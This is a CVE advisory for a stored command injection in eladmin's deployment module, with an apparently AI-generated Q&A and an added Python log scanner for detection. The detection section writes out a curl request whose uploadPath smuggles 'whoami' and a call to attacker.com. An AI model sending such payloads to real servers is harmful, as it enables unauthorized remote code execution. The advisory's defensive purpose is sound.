CVE-2026-10550
Command Injection in Eladmin Application
Publication date: 2026-06-02
Last updated on: 2026-06-02
Assigner: VulDB
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| elunez | eladmin | up to and including 2.7 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-10550 is a second-order stored command injection vulnerability in the elunez_eladmin application, affecting versions up to v2.7. It exists in the application deployment module due to insecure implementation and insufficient input validation.
Low-privileged users with app:add or app:edit permissions can bypass weak prefix validations on configuration fields such as uploadPath by injecting shell metacharacters. These malicious inputs are stored in the database and later executed with high privileges when an administrator or automated pipeline triggers deployment.
The vulnerability arises from unsafe command execution where user inputs are directly concatenated into shell commands and executed via an interactive SSH shell (ChannelShell) without proper sanitization, leading to unauthorized Remote Code Execution (RCE) and privilege escalation.
How can this vulnerability impact me?
This vulnerability allows an attacker with low-level permissions to inject malicious commands that are later executed with high privileges during deployment.
The impact includes unauthorized Remote Code Execution (RCE), which can lead to full system compromise, privilege escalation, and potentially control over the affected server or environment.
Attackers can exploit this by submitting specially crafted payloads that are stored and later executed, bypassing normal security controls and potentially causing significant damage or data breaches.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for suspicious POST or PUT requests to the endpoints /api/app and /api/deploy/deploy that include unusual or malicious payloads in JSON fields such as uploadPath, deployPath, backupPath, startScript, and deployScript.
Specifically, detection can focus on identifying payloads containing shell metacharacters or command injection patterns, such as newlines or command substitution sequences.
When searching server logs or network traffic, look for POST requests whose payloads resemble the one in the following example command, where newline escapes in uploadPath are followed by additional commands:
- curl -X POST http://<target>/api/app -H 'Content-Type: application/json' -d '{"uploadPath": "/opt/apps\nwhoami\ncurl attacker.com"}'
Additionally, monitoring for unexpected command executions triggered by deployment processes or unusual SSH ChannelShell activity may help detect exploitation.
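The detection described above, as an added example that is not part of the original page or of the eladmin project: a Python scan of request records for the named endpoints and fields. The JSON-lines record layout (method, path, body), the path allowlist and the sample records are assumptions constructed for illustration; script fields legitimately contain shell syntax, so hits on them are review prompts rather than verdicts.

```python
import json
import re

# Endpoints and JSON fields named in the advisory text above.
ENDPOINTS = ("/api/app", "/api/deploy/deploy")
PATH_FIELDS = ("uploadPath", "deployPath", "backupPath")
SCRIPT_FIELDS = ("startScript", "deployScript")
# Assumption: a legitimate path is absolute and uses only these characters.
SAFE_PATH = re.compile(r"/[A-Za-z0-9._/-]*")
# Newline, command separators, pipe, backtick and $( command substitution.
SHELL_META = re.compile(r"[\r\n;&|`]|\$\(")


def inspect_body(body):
    """Return (field, reason) findings for one decoded JSON request body."""
    findings = []
    for field in PATH_FIELDS:
        value = body.get(field)
        if isinstance(value, str) and not SAFE_PATH.fullmatch(value):
            findings.append((field, "path outside allowlist"))
    for field in SCRIPT_FIELDS:
        value = body.get(field)
        if isinstance(value, str) and SHELL_META.search(value):
            findings.append((field, "shell metacharacter, review"))
    return findings


def scan(lines):
    """Yield (line_no, path, findings) for suspicious POST/PUT records."""
    for line_no, line in enumerate(lines, 1):
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # not a JSON record; skip
        if not (isinstance(rec, dict) and rec.get("method") in ("POST", "PUT")
                and rec.get("path") in ENDPOINTS):
            continue
        body = rec.get("body")
        findings = inspect_body(body) if isinstance(body, dict) else []
        if findings:
            yield line_no, rec["path"], findings

# Constructed sample records (assumed JSON-lines layout), not captured traffic.
SAMPLE_LOG = [
    '{"method": "POST", "path": "/api/app", "body": {"uploadPath": "/opt/apps/demo"}}',
    '{"method": "PUT", "path": "/api/app", "body": {"uploadPath": "/opt/apps\\nwhoami"}}',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Because the injection is second-order, the same `inspect_body` check is worth running over configuration values already stored by the application, not only over new requests.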
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting or disabling the ability of low-privileged users to submit or edit application deployment configurations, especially fields like uploadPath, deployPath, backupPath, startScript, and deployScript.
Implement strict input validation and sanitization on these fields to prevent injection of shell metacharacters or command sequences.
Avoid direct string concatenation of user inputs into shell commands; use safer command execution methods that either do not invoke a shell or properly escape inputs.
Monitor and audit deployment triggers and related SSH shell executions for suspicious activity.
If possible, apply patches or updates from the vendor once available, or consider disabling the vulnerable deployment features until a fix is released.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The provided information does not specify any direct impact of this vulnerability on compliance with common standards and regulations such as GDPR or HIPAA.